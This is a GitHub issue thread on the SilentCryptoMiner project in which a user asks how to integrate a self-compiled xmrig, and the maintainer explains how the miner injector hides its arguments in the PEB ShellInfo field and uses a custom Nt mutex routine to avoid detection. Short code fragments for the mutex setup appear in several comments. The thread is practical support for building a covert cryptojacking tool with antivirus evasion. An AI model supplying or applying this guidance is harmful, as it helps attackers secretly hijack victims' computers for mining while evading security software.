### ISSUE TITLE
Hello Bro Once again

### ISSUE THREAD

**Issue by tarekxxx** [UnamSanctam/SilentCryptoMiner#2232]
it possible to compile my xmrig and put in your recources and it will work same ?

**Comment by UnamSanctam** [comment]
Yes, though since the miner injector currently passes the command line arguments encrypted through the ShellInfo part of the PEB (to better hide it) then you need to change the miner injector code to instead pass the command line arguments unencrypted as the command line. The miner injector also passes a random string just before the normal command line arguments, it's recommended that you inside your xmrig take that first random string and create a global mutex with it.

**Comment by tarekxxx** [comment]
its possible to take copy if your source code xmrig you mod ?

**Comment by tarekxxx** [comment]
its this possible ? to send me project  you mod ?

**Comment by UnamSanctam** [comment]
Sorry there's currently no repository for it, but it's quite easy to change the miner to inject by using the command line instead of the PEB, and then adding a mutex inside xmrig.

**Comment by tarekxxx** [comment]
i try to do it inside 
xmrig.cpp
but its not working correctly :( its possible to sent you my email and sent me it ? if this not available in public ?

**Comment by UnamSanctam** [comment]
Do you know how to code in C++? What is it that you're trying to do? Get the miner ID string of the command line and create a mutex?

**Comment by tarekxxx** [comment]
UNICODE_STRING umutex = init_unicode_string(L"\\BaseNamedObjects\\#MUTEXMINER");
OBJECT_ATTRIBUTES attr;
InitializeObjectAttributes(&attr, &umutex, 0, NULL, NULL);
HANDLE hMutex;
if (!NT_SUCCESS(UtCreateMutant(&hMutex, AYU_OBFC(MUTANT_ALL_ACCESS), &attr, TRUE))) {
    return 0;
}
i mean this one should be in main of xmrig or what ?

**Comment by UnamSanctam** [comment]
That's a special Nt implementation that the miner uses to avoid detections, but you likely don't have any library like that. You can use the official Windows API way to create a mutex if you want, like so: `CreateMutexW(NULL, TRUE, L"Global\\MINERID");` with the MINERID part being the first string sent in the command line options.

**Comment by tarekxxx** [comment]
mean this 
stringb.Replace("#MUTEXMINER", F.Randomi(24, true));

**Comment by UnamSanctam** [comment]
That's not for the xmrig, that's for the miner injector/installer, the MINERID for the xmrig is sent through the PEB (ShellInfo) which you'll probably have to change to the command line instead, then it will send the MINERID as the first argument of the command line.

**Comment by Chimera16** [comment]
@tarekxxx Did you manage to get it to work?
